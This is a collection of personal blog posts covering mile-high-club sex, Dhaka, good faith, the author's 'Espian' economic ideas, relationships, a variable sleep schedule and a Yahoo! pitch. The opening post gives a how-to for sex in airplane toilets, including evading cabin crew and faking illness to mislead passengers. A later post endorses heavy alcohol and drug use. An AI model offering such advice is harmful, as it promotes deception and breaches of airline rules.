
The Mile High Club is simply about having sex in an airplane. It's a thrill and a half — and by far the best entertainment on long haul flights.

When I was young I had presumed that this privilege was limited to flights in private jets, but with experience I can state that commercial flights are also good game.

Execution is generally dependent on who happens to be sitting next to you. But you don't need to leave this to chance. After all, luck is simply the meeting point between preparation and opportunity.

So how do you increase your chances? How do you ensure that you DON'T have a minger sitting right next to you? The obvious is to have your girlfriend/boyfriend travelling with you. Failing that you need to do a little bit of work during check-in.

Start by identifying someone suitable. Then get yourself next in line to them and take advantage of the long check-in times to start seducing them. There's something about airports that makes people very open.

You then want to casually suggest that you both get your seats next to each other so that you can carry on with the conversation in-flight and pass time pleasantly. If you are at all engaging, this is very easy. I've had a 100% success rate in getting new friends to sit next to me on fights.

Once you are both checked-in, you want to make yourself scarce for a little bit of time. A little separation only adds to the excitement.

Once you are on-board, continue with the conversation. Start discovering each other. Be patient and gradually increase the seduction by a few notches. Take advantage of the physical proximity for casual tactile contact and introduce sexual imagery into your conversation. Be classy.

Talk about the Mile High Club and gradually convince them of the idea. It is after all, a great experience! For those not skilled in seduction, the key is to simply be genuine, relaxed and have your breathing in sync with the other person.

Now comes the tricky part — assuming the other person is interested and sexually excited — timing.

You need to choose a time when both the queues and turbulence are minimal so that the cabin crew don't come and disturb your time in the only place for privacy — the toilet.

Unless you are on a private jet or can wing true privacy, only be sexual inside a toilet. The thrill of getting caught adds to the excitement, but don't be stupid like this pair!

You and your new friend now need to subtly get into the same toilet together. Don't worry about the entry too much — it's the exit that's a problem. And assuming the chemistry is great and that you are well prepared, you should both have a great time — feel the love!

Once the enjoyment has been had though, you now need to get out and face your fellow passengers who have been waiting in line for a while — or perhaps even cabin crew…

One trick is to get the other person to pretend to be slightly ill. And then you can “help” them as you get back to your seats. It immediately suggests to anyone suspicious that nothing untoward has been happening. Your post-orgasmic bliss can continue uninterrupted!

Once back in your seats, continue as before — who knows, you might find the love of your life this way. Or if not, you'll at least make a few good friends.

I hope this how-to has been useful in some way. Let me know in the comments how your experiences go. And, please, be respectful to the sensibilities of your fellow passengers — there might be children and nuns on board.

Dhaka has a distinctive aroma. I had expected it to smell like Mumbai or perhaps even Chennai. But it seems that whilst there's quite an overlap, these South Asian mega-cities have their own unique identities after all.

Advertisements for mobile phones and phone networks are everywhere. It wasn't even a decade ago when these advertisements would have been for “cool drinks” like Pepsi and Coca-Cola. But times change.

It's raining. Fly a few thousand miles and it's still raining. Perhaps one of us is like the Rain Man in the 4th HHGTTG book?

The people are smiling. Always a good sign. The traffic slows to a standstill. Time to soak in the noise. Poverty all around. Billboards for Grameen companies everywhere. Wonder what this city looked like 50 years ago?

Earlier this week, I ended up counselling two sets of organisations with regards to each other. They were trying to work with each other but had various concerns and felt that they needed to be “hard” to ensure that they didn't get over-run.

Whilst it is perfectly legitimate to have concerns — especially when it comes to financial matters — most of the concerns would have evaporated had both sides simply assumed good faith about the other.

And as someone who was privy to the private concerns of both parties, I can confidently state that they were both acting out of good faith — they just didn't have the same opinion about the other.

I generally live my life with the assumption of good faith with regards the behaviour of others. And as a result have a lot less to worry about in terms of my interactions. To be fair, this has not always ended up in ideal results.

But the assumption of good faith forms part of the basis for a rule of ethics — which, in my opinion, certainly lends itself towards a better quality of life in general than a rule of law.

Which do you prefer and why? Do you assume good faith in your interactions? Let me know in the comments!

Ideas require the right kind of incubation. They need to be nurtured before being taken into the world — at the right moment in time.

The nurturing and timing of ideas is one aspect which most innovators and entrepreneurs seem to miss. And I certainly can't talk about timing — as the tyranny of timing is something that I've had to learn the hard way.

But I've been extremely lucky with respect to the nurturing of ideas. For reasons still unknown, extra-ordinary individuals seem to be attracted to me. And their influences have been pure gold.

This is a reflection of something that I've heard referred to as the “Florence Effect”. That is, whilst statistically speaking we should have millions of Einsteins and Da Vincis walking amongst us, the reason many of them haven't tapped into their full potential is due to a lack of a nurturing, vibrant community.

In contrast, if you take Florence or Rome during the High Renaissance, you will see that the likes of Leonardo da Vinci, Michelangelo, Raphael, Botticelli, Ghirlandaio and Perugino all hung around the same areas.

Not only would they have influenced, inspired and critiqued each other, but many of them actively taught some of the others. Their social networks would have overlapped considerably enough that ideas would have flowed much faster than at other points in history.

The various localities of Florence and Rome — with their various patrons — acted as a positive echo chamber within which ideas and inspirations would have flowed and been nurtured. We need such spaces for the cultural creatives of our times.

For me, the #esp IRC channel has been one such space. And you can see its influence even in the evolution of just two of the ideas:

• Organisational Model & Pecus
• Gift Economy

For the first employment contract, I wrote (in 1999):

The full employees collectively form the “Ecclésia”, and this group owns fifty percent of the Company shares. The Ecclésia elects (by the Australian ballot) on a quarterly basis an executive council of 7 chief officers. This council will decide on company policies on a day-to-day basis, and will put to vote before the Ecclésia – matters of serious import. However, any member of the Ecclésia may voice their opinion on all matters.

Company work will take place over the Company Extranet. The Ecclésia will decide on new projects and assign values of their worth, as well as elect the Project Leader. It is then up to the Project Leader, to define the Jobs needed to be done for the success of the Project, and their respective values in plex economic currency units (pecus).

This later evolved to include trust-based algorithms and certifications — as can be seen from this chat log about the Espian model in 2001. And on an unrelated front, I was also rambling on the Espra dev list about gift economies — also in 2001.

But at that time, these were two separate ideas. But gradual conversations with others helped identify key problems. And in the iterative refinements I came to the intuitive realisation that they were somehow two aspects of the same whole. That there was a simplicity beyond the complexity.

And in my attempt to unify the elements — through hundreds of conversations — early last year, I ended up with:

But it was only after yet more criticism and dialogue earlier this year that I finally ended up with the true essence of the model. What I now call the “Espian ecology” — where the initial Pecus I had touched upon and the gift economy are just two parts of one simple structure.

I'll write an article on it later this month. Until then, what has your experiences been with regards to the evolution of ideas?

A week can sometimes be the difference between heaven and hell. Especially when it comes to matters of the heart.

This one week in December 2006, one of my lovers went from being “madly in love” with me to “hating” me. It seems that I tend to bring out extremes of emotions in people.

Most of these emotional extremes can be isolated down to one major trait of mine. I tried to explain it in a post break-up letter to her:

wrongly assumed that emotional hurt can be glossed over if the spirits are strong. assumption — the mother of all tragedies. but that statement needs some elaboration.

like the naive fool that i am, i place emphasis upon the spiritual connection betwixt indivudals. treat the temporal as inconsequential. because fundamentally, it is. and, as you once said, life shouldn't be taken too seriously.

thus most actions are just superficial and should be repairable. naive? yes. have i learnt otherwise? fuck yeah! go team america! hope this explains the “goldfish memory” behaviour that you witnessed.

What's the trait which causes so much harm? My tendency to speak my mind — uncensored. Whilst perfectly capable of being diplomatic, I've never seen any reason to censor my speech to those close to me.

Perhaps this is laziness on my part. I could have avoided most of the arguments in my life if only I had chosen my words more carefully. But doing so seems to conflict with my intentions of being genuine. To me, consciously altering one's words is comparable to manipulation.

This also ties in with two other characteristics of mine:

• Loving unconditionally
• Living across time

I have always tried to love unconditionally. This is reflected in the fact that I have never been able to fall out of love with those I have loved. Love eternal. When love is unconditional, surely trivial elements should not matter?

Also, unlike most people, within the confines of my mind, I live across time — not limited to the current juncture of the temporal axis. The positive emotions I experienced in the past are as true today as they were back then:

But both of these traits seem to be in contradiction with the experiences of most others. I have met few people who love unconditionally and fewer still who treat their past emotions as if they were still true today.

Perhaps this is healthier. Perhaps this is how people manage to engage in new relationships — unhindered by past emotions. But in doing so, I can't help but feel that people are just lying to themselves. And worse, the more one suppresses certain forms of emotions, the less one feels in the present and the future.

I have certainly felt elements of that decline in relationships as I have gotten older. The unbridled love I experienced in my teenage years pale in comparison to the restrained love I later experienced. All of that derives from fear of being hurt yet again and the occasional attempts of suppressing past emotions.

But the attitude towards love being eternal has gotten me into a mess more than once. I remember one weekend when a lover and I were so enthralled with each other that we were both experiencing orgasmic states before we had even engaged in any physical acts.

But fast forward to the weekend after that and you will have found her broken hearted. Why? Because during a discussion, I naively stated that one of my previous lovers and I were “one and the same — no difference between us”.

It had not been my intention to hurt her with that statement. Only in the days after that did I fully realise just how painful it must have been for her to hear that. Only later could I see how that statement could have been construed as being a denial of her. It was never meant to be so.

By living across time, I feel the past as intensely as the present and the emotions never dull. And especially since my experience of having an orgasm from just dancing, I have strongly felt connected to all beings in this Universe.

Being truly connected to all beings — starting with those close to me — is my highest aspiration. It is a reflection of the Truth that is this Universe. It enables, empowers and vitalises.

It reminds me of a quote by Martin Luther King Jr.

“I believe that unarmed truth and unconditional love will have the final word.”

But, I cannot help but wonder if my approach is somehow fucked up? Is there something better I can do? Your thoughts and comments would be truly appreciated. Thanks!

My mother emailed me saying:

“We see what we believe, and not just the opposite; and to change what we see, it is sometimes necessary to change what we believe.”

I love my mum. She so wise! What she says seems to be the core message in personal development processes like “The Work” by Byron Katie.

And it also ties into what I've been pondering lately regarding sleep cycles. Especially since, whilst growing up, I experienced different sleep cycles with my mother. When really young, she'd wake me up really early. And then as a kid, we'd often talk late into the night whilst she worked on some poetry or did some research.

Sleep is one of those topics which many of us have rather fixed preconceptions about. We all need it. It plays a vital role in our well being. It plays a large part in defining our lifestyles. Yet, despite enjoyable dreams, it takes up so much of our short lives.

Now I've experimented with lots of different sleeping patterns. Everything from intense sleep deprivation to the Uberman sleep schedule. But I have yet to find the ideal sleep pattern. So I decided to map out my requirements:

• An average of 6 hours of sleep a day.
• Awake at dawn — the most magical time of the day.
• Time for regular “meta” activities which are vital for a balanced life.
• At least 10 hours “quiet” time every other day for highly productive work — for me this is often at night time hours when distractions are minimal.
• Awake and alert for at least 10 hours of professional interactions with others every other day, e.g. negotiations, meetings, &c.
• Awake across “normal” work times in various time zones — especially Europe, Americas and Asia.
• Time to have an active social life — with lots of music and dancing.
• Time to cuddle up with a lover — who probably also leads a busy life — after sex.

Some of these requirements are probably familiar to those who've read my earlier post on daily routines. The last point reminds me of one of the funniest videos I've seen in recent years:

Taking all of the requirements into account, I eventually ended up with the following ruleset. I call this the “Variable Sleep Schedule”:

• Three sleep time slots are defined:
  • 2pm - 8pm (slot 1)
  • 8pm - 2am (slot 2)
  • 2am - 8am (slot 3)
• Within the period of two days, two of those sleep slots must be filled. No more. No less.
• Under ideal circumstances, sleep will be enjoyed during slot 1.

Not only does the above ruleset provide a useful and flexible structure. But as can be seen from the diagram representing my online activity hours over the last 8 years, it isn't too far off my existing “natural” pattern.

All times are in UK time — whether with daylight savings or otherwise. In fact, the time slots are specifically for the UK so that the timezone deviations with other regions fits in nicely. By sleeping during slot 1, I can be awake for:

• Morning, lunch and late night interactions in the UK and Europe.
• Afternoon and evening interactions in the Americas.
• Morning, afternoon and evening interactions in Asia.

I can take advantage of the time immediately after waking up — when the brain is highly active — to do some quality productive work. Avoid the hassles of rush hour. And have meetings from 6 o'clock in the morning =)

And if for any unavoidable reasons, e.g. important afternoon meetings or social engagements, I have to skip sleep on any given day, I can catch up on the sleep debt by sleeping for 2 slots the next day.

In short, I am very excited by this sleep schedule! Question is, what will my lovers make of this? ;p

A fortnight ago, I emailed Jerry Yang, the co-founder and CEO of Yahoo!. It was yet another unsolicited Yahoo! Turnaround Strategy proposal. My little offer to help turn Yahoo! around.

Given that Jerry doesn't know me from Adam I wasn't expecting an immediate reply. But it's now been 2 weeks and still no reply. If anyone knows Jerry Yang and finds my proposal useful, I'd appreciate it if you could prod him to get back to me.

You can find the email I sent below. Apologies for the message being in lower-case — Jerry is famous for writing in that way. And given that for a long time I also had a fascination for the miniscule, I found it rather natural to write to him in that manner.

The email also serves as an introduction to some of the Espian ideas. Would love to hear your comments on those aspects too. Thanks!

Netiquette has long been a dying trait. At best I hope that people might read something like Seth's Email checklist. But I have long stopped expecting others to adhere to much sense on this front.

But the "Don't print this Email" footer meme just managed to push past the annoyance tipping point for me. Especially since it came from someone who I admire as a great systems thinker!

I understand that it is well meant. People would like to show that they care for the environment and would like to encourage having less of an impact on the world. Laudable intentions.

But having a footer on every email is just plain stupid. Especially the large companies who insist on having several paragraphs of text explaining why you shouldn't do so and just how super cool and eco-friendly they are. Often these footers are larger than the body of the message itself!

So why is this stupid? Because by adding these footers you are causing more harm than printing those emails would be causing in the first place! The millions of servers handling email sit in data centers consuming serious amounts of energy!

And the additional size of each and every message — especially as they get replied to and included in replies — adds up to a serious amount of energy use! More routers, servers and switches are needed just because people couldn't handle a bit of systems thinking.

It's not just for keeping the user interface simple that companies like Google spend such effort keeping their home page to less than 28 words. Each extra useless byte directly results in more energy use and a lot more CO2 in the atmosphere.

So, please for the love of the environment, stop including that footer in your emails. The point has already been made. I stopped printing emails in 1999. Just have a chat with people who still insist on printing out their emails. And stop wasting the most precious asset we all have — time!

After a week of heavy pondering, I have nailed down the required functionality for Bootstrap. Have a read:

• Boostrap draft specification

Then let me know what you think in the comments below!

Bear in mind that this is not Espra. It is not based on the Plexnet. It is not decentralised. It is not meant to scale to millions of users. It is only meant to achieve the following:

1. Enable interesting small-scale communities, e.g. socialaction.tv
2. Demonstrate some of Espra's utility, e.g. Trust Maps.
3. Establish credibility with the world that the Espians can code =)
4. Be a powerful communications tool to facilitate Espra's development.
5. Bring in short-term consultancy revenue.

Not to be a fatalist, but I'm increasingly observing how frequently “coincidences” seem to be taking place.

Case in point, this morning Zooko messaged me out of the blue. It's been a few months since we last spoke and was nice to briefly catch up. He pointed me to his latest work — AllMyData.com — an online storage service running on Tahoe, the P2P network he's been working on.

And it just so happened that earlier this evening, I was in need of a storage service to integrate into the coming Bootstrap specification. AllMyData happens to be one of the best fits — closely shadowed by box.net.

Neither contact from Zooko nor the need for a storage service is particularly surprising. But for it to happen on the same day is a pretty low probability. And on its own, not so surprising.

But taken together with all the other hundreds of little opportune coincidences that seem to take place in my life, I begin to wonder if coincidences really are coincidences?

I am a real-time operating system. Alive in the moment. Fluid to all that happens around. But this is only possible thanks to a seemingly contradictory requirement:

I need clear boundaries.

Without clearly defined boundaries, I end up in a sea of endless possibilities and confusion. The number of possible permutations becomes too much to handle and I find myself incapacitated.

But if I can clearly define boundaries between the various shades of grey that life presents us with, I suddenly find myself liberated and able to act without having to think.

I then only have to bear in mind the single rule:

Be alive!

This is true freedom. I don't have to contemplate the consequences of my actions and can freely flow as events unfold.

I can do things like getting completely hammered on alcohol and drugs without worrying about my actions. I can trust myself with absolute confidence. I can take risks without worry. Confidence flows unhindered by pointless contemplations.

However, this isn't a perfect approach. Let me illustrate with two examples.

The first involves my principles with regards to friendship. Whilst generally friendly to all living creatures, I have clearly defined distinctions with regards to how I behave with friends and those who are not friends.

This allows me to be highly “scalable” with regards to the number and depth of the relationships I have. But one time, my rather fixed boundary put me in a rather unpleasant situation.

A friend and I met this girl on the same evening and we ended up competing for her over the following week. Normally I have no qualms competing with a guy for a girl. I can outcompete with ease.

But trying to compete with a friend just left me paralysed. My friendship boundary involves not fucking over friends. But how the hell are you meant to compete with a guy for a girl and not screw him over in some way?

Another point when my sharp boundaries caused some unpleasantness was when I once invited a friend of mine to join a girlfriend and myself in bed one night.

The night itself was rather enjoyable and pleasant. However, the next morning, my sharp boundary thing meant that he was back to being just a friend with the two of us.

Unfortunately, he saw life as shades of grey and managed to piss me off a bit by trying to be intimate with my girlfriend. Not in a sexual way, but just with physical closeness.

Now I could totally understand it from his perspective. It makes for a gentler easing out after sexual intimacy with her, but for me life operates around clear boundaries — especially around friendship, intimacy and love.

But despite occassional blips like this, the clearly defined boundaries allows me to operate in real-time and be totally fluid in how I live. I can also make extremely long-term commitments, e.g. Espia, because I know myself.

What do you all think? Does my approach make any sense? Do you have similar approaches?

At some point this blog will transfer over to http://tav.espians.com — but, until then, here's a persistent URL:

• http://purl.org/asktav

Bookmark it now! =) And, in case you didn't know, PURL is a great “Persistent” URL service.